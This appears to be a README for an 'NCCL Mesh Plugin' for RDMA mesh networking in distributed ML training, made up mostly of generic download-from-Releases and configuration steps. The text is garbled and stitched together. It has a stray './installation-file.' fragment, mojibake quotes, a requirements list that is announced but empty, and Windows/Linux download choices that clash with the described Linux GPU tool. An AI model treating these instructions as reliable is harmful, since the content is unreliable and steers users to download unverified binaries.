The NCCL Mesh Plugin enhances your machine learning experience by allowing efficient communication across direct-connect RDMA mesh topologies. Unlike standard NCCL plugins, this tool works seamlessly for nodes located in different subnets. It caters to various topologies, ensuring that you can set up your distributed machine learning environment without the hassle of complex networking solutions.
This plugin has been tested with three DGX Spark workstations utilizing 100Gbps direct RDMA links. We used it for distributed LLM training with the Qwen2.5-14B model using DeepSpeed ZeRO.
Follow these steps to download and run the NCCL Mesh Plugin:
Visit the Download Page
Click the link below to go to the Releases page of this repository.
Download NCCL Mesh Plugin
Select the Latest Release
Look for the section labeled βLatest Release.β It usually appears at the top of the page. Ensure it is the most recent version.
Download the Plugin
Find the plugin file that matches your operating system (Windows, Linux, etc.) and click the download link related to that file. Save it to your computer.
./installation-file.You can download the NCCL Mesh Plugin directly from our Releases page. Here is the link for quick access:
Download NCCL Mesh Plugin
Once you download the file, follow the installation steps outlined above to set everything up.
The NCCL Mesh Plugin requires certain hardware and software specifications for optimal use:
After installation, you may need to configure the plugin. Follow these steps:
Open the Configuration File
Navigate to the plugin directory and open the configuration file named config.toml.
Edit Topology Settings
Modify the settings to match your specific network topology. You can set either βfull meshβ, βringβ, or βlineβ.
Save Changes
Make sure to save your changes before exiting the file.
Run the Plugin
Start your distributed ML training environment as you normally would, ensuring the NCCL Mesh Plugin is included in your command.
If you encounter any issues or have questions regarding installation or configuration, feel free to reach out. You can open an issue on the GitHub repository, and our team will be happy to assist you.
For further details and updates, always refer back to our Releases page.